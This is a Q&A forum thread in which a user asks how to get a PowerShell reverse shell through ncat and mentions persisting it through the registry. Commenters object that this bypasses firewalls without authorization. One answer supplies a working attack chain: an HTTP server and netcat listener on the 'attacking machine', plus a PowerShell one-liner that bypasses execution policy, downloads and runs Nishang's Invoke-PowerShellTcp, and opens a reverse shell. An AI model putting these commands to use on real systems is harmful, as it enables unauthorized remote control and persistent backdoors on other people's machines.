2

I am using ncat to execute a reverse "cmd" shell from one machine to another and without any issues using the commands:

In my machine:         ncat -l 443
In the remote machine: ncat <my ip> 443 -e cmd

And all works flawlessly, however, I would very much prefer "powershell" to be executed instead of "cmd", for that I did this:

In my machine:         ncat -l 443
In the remote machine: ncat <my ip> 443 -e powershell

But now a strange thing happens, the powershell prompt is given to the remote machine and not mine... This is the output:

In my machine: Windows Powershell
               Copyright 2009 Microsoft Corporation. All rights reserverd.   (and it hangs there)
In the remote machine: PS C:\Users\User>      (the shell is actually given to the remote machine)

Is there a way to redirect that prompt to my machine again, and have the "powershell" shell in my machine as I did with the "cmd" shell? I searched for stdout redirection but could not make it work :(

Any help would be very much appreciated.

samsam
  • 29
  • 1
  • 1
  • 3
  • 2
    What problem are you trying to solve, that you couldn't solve using Powershell Remoting? – mfinni Apr 10 '14 at 17:08
  • I would like to have a persistent connection to a remote server in case of an emergency. For that I will place a .bat file in HKLM with the content: ncat 443 -e powershell. And then set a password to that connection so not anyone can use it, but for now I would be very happy if I could just have the reverse powershell shell working =P – samsam Apr 10 '14 at 17:14
  • 2
    You're still not answering my question - what problem are you trying to solve? "in an emergency" doesn't tell me anything, because the circumstances in which this would work but PS Remoting wouldn't, are eluding me. – mfinni Apr 10 '14 at 17:19
  • Please correct me if I am wrong but if I use PS Remoting I will have to create a direct connection to the remote machine, and most firewalls could deny access. That is way I would prefer to have a reverse Powershell connection using ncat. – samsam Apr 10 '14 at 17:23
  • 1
    This isn't very professional. You're allowing plaintext over the internet, using port 443 so it superficially looks like HTTPS, to traverse firewalls without the permission of the firewall owner? Because if you had permission, you could get remote access properly. If you were doing this to admin my servers, you wouldn't be working for me anymore. If I'm misunderstanding you, please do let me know. – mfinni Apr 10 '14 at 17:26
  • 1
    :( Take it easy man I am also asking this just for the curiosity and the knowledge. The reason why cmd works but powershell doesn't is intriguing me. I am sure it has to with some stdout/input redirection but the way to make it work is for now sadly beyond my knowledge. – samsam Apr 10 '14 at 17:40
  • 1
    You've read the Help link, right? This site is intended for professional systems administrators doing work on production systems. You're trying to solve a problem that would make most sysadmins say "Please slow down and start from the top." I agree that the question you're asking is good for curiosity, and I'd even like to know the answer, but it's an inappropriate method of remote access for production systems. – mfinni Apr 10 '14 at 17:46
  • 1
    Netcat hooks into a process by launching the process and then redirect the standard I/O (stdin,stdout,stderr). I would guess that Powershell is doing something unusual and not the standard I/O streams, or closing the streams and re-opening new ones or something... – Zoredache Apr 10 '14 at 21:03
  • 1
    If you have the authorization to make a persistent connection to the server, then you should be able to use PS remoting anyway. – Michael Hampton Apr 10 '14 at 22:04
  • any news on this? I tried with nc, the session was opened. But the shell just hang there without returning any output after I entered a command. – Krypton Mar 25 '18 at 15:43

2 Answers2

1

The reason that the Powershell hangs on the reverse shell of your attacking machine might be due to it not being fully interactive. Try to use PowerShell-based shells like Nishang's Invoke-PowerShellTcp. Download the .ps1 script on your attacking machine, run a HTTP server for the remote host to download the script from, then download it on the remote machine.

Setting up an HTTP server on your attacking machine using either Python 2 or Python 3

python -m SimpleHTTPServer [port]
python3 -m http.server [port]

Also on your attacking machine, run a netcat listener:

nc -lnvp [port2]

Then run this on the Command Prompt (cmd) of the remote machine

powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://[your attacking machine's IP address]:[port1]/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress [your attacking machine's IP address] -Port [port2]"

The caught reverse shell on your netcat should now be fully interactive.

user3052604
  • 11
  • 1
-1

This should get you started on the right path:

http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

Daniel
  • 215
  • 1
  • 3
  • 6
  • Please don't post link-only answers. – Massimo Mar 31 '16 at 23:49
  • Yes, link-only answers are low quality, since links can change/go stale/dead, and thus future readers would not be able to learn from your solution. Please edit your post to include the relevant details/code directly. – Castaglia Apr 01 '16 at 01:32